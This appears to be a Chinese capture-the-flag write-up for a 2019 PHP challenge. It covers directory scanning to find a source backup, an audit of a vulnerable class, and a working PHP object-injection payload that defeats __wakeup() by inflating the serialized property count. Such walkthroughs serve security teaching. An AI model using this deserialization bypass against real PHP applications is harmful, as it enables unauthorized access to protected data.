[极客大挑战 2019]PHP

dirsearch扫描网站目录，对扫描到的结果用grep查找200的结果

发现有一个www.zip网站备份文件，访问www.zip，下载之后对代码进行审计，

查看flag.php，结果不对。

index.php有一段include调用

审计class.php

  <?php
  include 'flag.php';
  
  error_reporting(0);
  
  class Name{
      private $username = 'nonono';
      private $password = 'yesyes';
  
      public function __construct($username,$password){
          $this->username = $username;
          $this->password = $password;
      }
  
      function __wakeup(){
          $this->username = 'guest';
      }
  
      function __destruct(){
          if ($this->password != 100) {
              echo "</br>NO!!!hacker!!!</br>";
              echo "You name is: ";
              echo $this->username;echo "</br>";
              echo "You password is: ";
              echo $this->password;echo "</br>";
              die();
          }
          if ($this->username === 'admin') {
              global $flag;
              echo $flag;
          }else{
              echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
              die();
    
          }
      }
  }
  ?>

发现这里__wakeup()会把我们的用户名改为guest，其在__destruct()函数中如果用用户名不是admin则不会输出flag。所以我们要绕过__wakeup()函数。下面对Name对象进行序列化，再修改其中一个值。这里将Name属性数由2改为3

  <?php
  class Name{
      private $username = 'admin';
      private $password = '100';
  }
  $select = new Name();
  $res = serialize($select);
  echo $res;
  ?>
  # res输出结果，注意复制过来会漏空格，需要用%00补上:
  # O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
  # O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

最后payload为?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}，最后得到flag